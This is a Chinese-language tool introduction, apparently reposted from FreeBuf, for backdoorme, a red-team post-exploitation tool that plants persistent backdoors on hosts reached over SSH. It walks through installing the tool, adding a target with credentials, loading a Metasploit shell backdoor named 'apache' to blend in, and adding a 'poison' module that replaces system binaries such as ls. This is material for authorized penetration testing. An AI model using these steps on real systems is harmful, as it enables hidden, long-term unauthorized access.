前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >backdoorme:专为红队研究人员设计的自动化后门安全测试模块

backdoorme:专为红队研究人员设计的自动化后门安全测试模块

作者头像
FB客服
发布2023-12-02 14:22:48
1640
发布2023-12-02 14:22:48
举报
文章被收录于专栏:FreeBufFreeBuf

关于backdoorme

backdoorme是一款专为红队研究人员设计的自动化后门安全测试模块,广大安全研究人员和红队研究人员可以使用该工具实现渗透测试的持久化机制,并以此来测试目标系统的安全性,最终实现安全环境提升。

Metasploit可以帮助我们对目标系统环境进行安全渗透测试,但是当我们对目标设备执行完一次安全测试之后,想要再次访问目标设备,该怎么办呢?backdoorme便能够解决我们的问题。

backdoorme可以释放大量后门程序来帮助我们在目标设备中建立持久化机制,一旦跟目标设备建立了SSH连接,backdoorme的优势便出来了。但需要注意的是,backdoorme并不是一个能够获取root访问权限的工具。

请仅在获得明确许可的情况下使用backdoorme,该工具仅供安全测试和安全性提升使用,请不要将其用于其他目的。

工具安装

由于该工具基于Python 3.5+开发,因此我们首先需要在本地设备上安装并配置好Python 3.5+环境。接下来,广大研究人员可以使用下列命令将项目源码克隆至本地:

代码语言:javascript
复制
git clone https://github.com/Kkevsterrr/backdoorme.git

接下来,我们需要执行下列命令安装该工具所需的其他依赖组件:

代码语言:javascript
复制
$ sudo apt-get install python3 python3-pip python3-tk nmap                                 

$ cd backdoorme/

$ virtualenv --python=python3.5 env

$ source env/bin/activate

(env) $ pip install -r requirements.txt

工具使用

工具启动

启动backdoorme:

代码语言:javascript
复制
$ python master.py
代码语言:javascript
复制

添加目标:

代码语言:javascript
复制
>> addtarget

Target Hostname: 10.1.0.2

Username: victim

Password: password123

 + Target 1 Set!

>>

后门功能

如需使用后门功能,可以直接运行“user”命令:

代码语言:javascript
复制
>> use shell/metasploit

 + Using current target 1.

 + Using Metasploit backdoor...

(msf) >>

这里我们可以设置一个持久化后门,并使用“show options”或“help”查看配置的参数列表,使用“set”命令可以直接设置要使用的参数:

代码语言:javascript
复制
(msf) >> show options

Backdoor options:

 

Option Value Description Required

------ ----- ----------- --------

name initd name of the backdoor False

...

(msf) >> set name apache

 + name => apache

(msf) >> show options

Backdoor options:

 

Option Value Description Required

------ ----- ----------- --------

name apache name of the backdoor False

...

功能模块

每一个后门组件都支持添加额外的功能模块,使用“add”命令即可添加模块:

代码语言:javascript
复制
(msf) >> add poison

 + Poison module added

每一个模块都提供了额外的参数支持自定义功能:

代码语言:javascript
复制
(msf) >> help

...

Poison module options:

 

Option Value Description Required

------ ----- ----------- --------

name     ls   name of command to poison False

location /bin where to put poisoned files into False

许可证协议

本项目的开发与发布遵循MIT开源许可证协议。

项目地址

backdoorme

https://github.com/Kkevsterrr/backdoorme

https://travis-ci.org/Kkevsterrr/backdoorme

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2023-12-01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 关于backdoorme
  • 工具安装
  • 工具使用
    • 工具启动
      • 后门功能
        • 功能模块
        • 许可证协议
        • 项目地址
        相关产品与服务
        手游安全测试
        手游安全测试(Security Radar,SR)为企业提供私密的安全测试服务,通过主动挖掘游戏业务安全漏洞(如钻石盗刷、服务器宕机、无敌秒杀等40多种漏洞),提前暴露游戏潜在安全风险,提供解决方案及时修复,最大程度降低事后外挂危害与外挂打击成本。该服务为腾讯游戏开放的手游安全漏洞挖掘技术,杜绝游戏外挂损失。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档